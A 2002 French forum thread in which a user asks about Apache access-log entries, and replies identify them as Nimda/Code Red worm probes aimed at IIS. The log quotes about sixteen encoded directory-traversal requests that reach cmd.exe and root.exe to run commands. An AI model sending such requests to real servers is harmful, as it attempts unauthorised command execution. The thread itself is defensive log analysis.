log acces du serveur apache

log acces du serveur apache - Windows & Software

Marsh Posté le 27-09-2002 à 17:22:06    

Qu'est ce que ces lignes de commandes dans le log acces d'apache ??
 
 
 
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 310
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 308
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 318
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 365
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 315
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 315
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332
 
 
 
merci@+
 
 
 
 

Reply

Marsh Posté le 27-09-2002 à 17:22:06   

Reply

Marsh Posté le 27-09-2002 à 18:00:39    

tentative d'attaque par nimda ou code red
@+

Reply

Marsh Posté le 27-09-2002 à 18:37:28    

Spa bien
C'est bien ce qui me semblait.
Qqun pourrait-il commenter ces lignes ?
Mais code red ou nimda ne concernent que les serveur tournant sous llS non ?
 

Reply

Marsh Posté le 27-09-2002 à 18:46:12    

oui
mais là il tourne pas sur ton pc
il a juste essayé de t'infecter

Reply

Marsh Posté le 27-09-2002 à 19:05:47    

J'ai pas loin de 6 ou 8 attaques de ce type par jours.
Peut on porter plainte contre ce genre de conne*ie ?

Reply

Marsh Posté le 27-09-2002 à 19:13:08    

pas vraiment
c'est surtout dû au fait que les gars infectés ne le savent pas.
c'est pas colontaire de leur part.
tu peux chercher sur google comment marchent nimda ou cod red :)

Reply

Marsh Posté le 27-09-2002 à 19:34:10    

Merci pour tout
@+

Reply

Marsh Posté le 27-09-2002 à 19:36:46    

blueteen a écrit a écrit :

oui
mais là il tourne pas sur ton pc
il a juste essayé de t'infecter




 
Il a plutot essayé de voir si le serveur était vulnérable... Mais sous Apache ça risque pas.


---------------
#!/usr/bin/girl
Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed